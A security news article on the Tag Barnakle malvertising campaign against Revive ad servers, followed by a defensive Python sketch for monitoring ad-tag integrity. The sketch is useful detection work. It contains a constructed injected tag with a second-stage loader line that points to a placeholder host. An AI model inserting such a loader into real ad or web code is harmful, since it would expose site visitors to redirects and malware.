120 Compromised Ad Servers Target Millions of Internet Users



An ongoing malvertising campaign tracked as “Tag Barnakle” has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware.

Unlike other operators who set about their task by infiltrating the ad-tech ecosystem using “convincing personas” to buy space on legitimate websites for running the malicious ads, Tag Barnakle is “able to bypass this initial hurdle completely by going straight for the jugular — mass compromise of ad serving infrastructure,” said Confiant security researcher Eliya Stein in a Monday write-up.


The development follows a year after the Tag Barnakle actor was found to have compromised nearly 60 ad servers in April 2020, with the infections primarily targeting an open-source advertising server called Revive.

The latest slew of attacks is no different, although the adversaries appear to have upgraded their tools to target mobile devices as well. “Tag Barnakle is now pushing mobile targeted campaigns, whereas last year they were happy to take on desktop traffic,” Stein said.


Specifically, the websites that receive an ad through a hacked server carry out client-side fingerprinting and, when certain checks are satisfied, deliver a second-stage JavaScript payload in the form of click-tracker ads. That payload redirects users to malicious websites that lure visitors to an app store listing for fake security, safety, or VPN apps, which come with hidden subscription costs or hijack the traffic for other nefarious purposes.


Given that Revive is used by a good number of ad platforms and media companies, Confiant pegs the reach of Tag Barnakle in the range of “tens if not hundreds of millions of devices.”

“This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence,” Stein said.
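As an added illustration (not code from Confiant's write-up or from the Revive project), the following Python sketch shows how a publisher or ad-platform operator could monitor what an ad server actually delivers: it fetches the tag repeatedly as a first-time visitor, groups responses by hash, diffs any deviating response against a known-good baseline, and computes how many fresh samples a monitor needs when the payload is only shown occasionally, as the article says Tag Barnakle does. The baseline tag, the injected variant, the placeholder loader URL and the every-nth-request reveal schedule are all constructed for this example; the real gating logic is not described in the article.

```python
"""Ad-server delivery integrity sampler (added example; assumptions are labelled)."""
import difflib
import hashlib
import math
from collections import Counter

# CONSTRUCTED: a known-good delivery tag standing in for whatever the ad
# server normally returns. Not taken from the article or from Revive.
BASELINE_TAG = """(function () {
  var ins = document.createElement('ins');
  ins.setAttribute('data-zone', 'ZONE_ID_PLACEHOLDER');
  document.body.appendChild(ins);
})();"""

# CONSTRUCTED: the same tag with an appended loader line, standing in for an
# injected second stage. It is only a string used for diffing; nothing runs it.
INJECTED_TAG = BASELINE_TAG + """
(function () {
  loadSecondStage('https://example.invalid/stage2.js');  /* placeholder URL */
})();"""


def fingerprint(body: str) -> str:
    """SHA-256 of the served script, used to group observed variants."""
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def added_lines(baseline: str, observed: str) -> list:
    """Lines present in the observed response but absent from the baseline."""
    diff = difflib.unified_diff(
        baseline.splitlines(), observed.splitlines(), lineterm="", n=0
    )
    return [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]


def sample_ad_server(fetch, samples: int) -> dict:
    """Fetch the tag `samples` times; report every variant that differs from baseline.

    `fetch` must behave like a first-time visitor on every call (no cookie jar
    carried over), otherwise a cookie-gated payload may never be shown to the
    monitor at all.
    """
    baseline_fp = fingerprint(BASELINE_TAG)
    variants = Counter()
    deviations = {}
    for _ in range(samples):
        body = fetch()
        fp = fingerprint(body)
        variants[fp] += 1
        if fp != baseline_fp and fp not in deviations:
            deviations[fp] = added_lines(BASELINE_TAG, body)
    return {"samples": samples, "variants": dict(variants), "deviations": deviations}


def samples_for_confidence(reveal_rate: float, confidence: float = 0.99) -> int:
    """Smallest number of independent first-time fetches so that a payload shown
    with probability `reveal_rate` per fetch is observed at least once with
    probability >= `confidence` (1 - (1 - p)^n >= confidence)."""
    if not 0.0 < reveal_rate <= 1.0 or not 0.0 < confidence < 1.0:
        raise ValueError("reveal_rate must be in (0, 1], confidence in (0, 1)")
    if reveal_rate == 1.0:
        return 1
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - reveal_rate))


def constructed_fetch(every_nth: int):
    """CONSTRUCTED stand-in for an HTTP fetch: returns the injected variant on
    every `every_nth` call and the clean baseline otherwise, modelling a
    low-frequency reveal. A real monitor would issue a cookie-less request."""
    calls = {"n": 0}

    def fetch() -> str:
        calls["n"] += 1
        return INJECTED_TAG if calls["n"] % every_nth == 0 else BASELINE_TAG

    return fetch


if __name__ == "__main__":
    report = sample_ad_server(constructed_fetch(every_nth=10), samples=30)
    print(f"{report['samples']} samples, {len(report['variants'])} distinct responses")
    for fp, extra in report["deviations"].items():
        print(f"deviant variant {fp[:12]}... adds:")
        for line in extra:
            print("   ", line)
    print("fresh samples needed at 10% reveal, 99% confidence:",
          samples_for_confidence(0.1, 0.99))
```

The design point is the sampling budget: a single scan of an ad server that shows the payload to one visitor in ten will miss it nine times out of ten, so the monitor has to repeat the request with fresh client state and size the number of repetitions from the reveal rate it is willing to assume.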






Mourad ELGORMA


Founder of summarynetworks, passionate about new technologies and networking professions, Master's in networks and telecommunications systems. I have worked with Pascal, Delphi, Java, MATLAB, PHP; knowledge of the TCP/IP protocol, Ethernet applications, WLANs; planning, installation and troubleshooting of computer network problems; installing, configuring and troubleshooting Cisco IOS devices; monitoring network performance and isolating network failures; VLANs, routing protocols (RIPv2, EIGRP, OSPF); working with embedded systems (hardware and software, e.g. BeagleBone Black); Linux (Ubuntu, Kali, Mandriva server, Fedora, ...); Microsoft (Windows, Windows Server 2003); Packet Tracer, GNS3, VMware Workstation, VirtualBox, FileZilla (client/server), EasyPHP, WampServer, the WordPress management system; installation of surveillance cameras (Hikvision DVR technology).
